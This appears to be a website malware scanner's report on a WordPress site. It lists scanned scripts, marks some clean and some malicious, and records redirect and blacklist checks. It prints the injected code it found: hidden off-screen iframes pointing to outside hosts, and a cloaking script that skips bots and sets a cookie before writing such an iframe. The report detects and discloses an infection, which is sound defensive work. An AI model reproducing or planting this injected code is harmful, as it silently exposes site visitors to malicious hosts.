Scanned pages/files
| Request | Server response | Status |
http://lizamarroquin.com/ | 200 OK Content-Length: 32884 Content-Type: text/html | clean |
http://lizamarroquin.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 1129 Content-Type: application/javascript | malicious |
Malicious iFrame found. size: 160x137 src: http://poper.addisonian.ga This URL is marked by Google as suspicious <iframe style="position:absolute;margin-top: -1004px;" src="http://poper.addisonian.ga" width="160" height="137"> | ||
http://lizamarroquin.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 1129 Content-Type: application/javascript | malicious |
Malicious iFrame found. size: 160x137 src: http://poper.addisonian.ga This URL is marked by Google as suspicious <iframe style="position:absolute;margin-top: -1004px;" src="http://poper.addisonian.ga" width="160" height="137"> | ||
http://lizamarroquin.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/themes/headway/library/media/js/jquery.hoverintent.js?ver=3.9.3 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/themes/headway/library/blocks/navigation/js/jquery.superfish.js?ver=3.9.3 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/headway-article-builder/js/hover-overlay.js?ver=3.9.3 | 200 OK Content-Length: 974 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://bursaarhitectilor.tk/ccsmegaserver17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})(); Antivirus reports:
| ||
http://lizamarroquin.com/wp-content/uploads/headway/cache/block-dynamic-js-layout-index-80dfcb0.js?ver=3.9.3 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=4.6.3 | 200 OK Content-Length: 48722 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/LayerSlider/js/jquerytransit.js?ver=0.9.9 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com/wp-content/plugins/LayerSlider/js/layerslider.transitions.js?ver=4.6.3 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://lizamarroquin.com//lizamarroquin.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 03 Mar 2015 07:03:28 GMT Pragma: no-cache Location: http://lizamarroquin.com/lizamarroquin.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ Server: Apache Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Frame-Options: SAMEORIGIN X-Pingback: http://lizamarroquin.com/xmlrpc.php | clean |
http://lizamarroquin.com/lizamarroquin.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.1.12/ | 404 Not Found Content-Length: 32736 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lizamarroquin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 07:03:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
X-Pingback: http://lizamarroquin.com/xmlrpc.php
GET / HTTP/1.1
Host: lizamarroquin.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 07:03:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
X-Pingback: http://lizamarroquin.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: lizamarroquin.com
Referer: http://www.google.com/search?q=lizamarroquin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lizamarroquin.com
Referer: http://www.google.com/search?q=lizamarroquin.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lizamarroquin.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://lizamarroquin.com/
Result: lizamarroquin.com is not infected or malware details are not published yet.
Result: lizamarroquin.com is not infected or malware details are not published yet.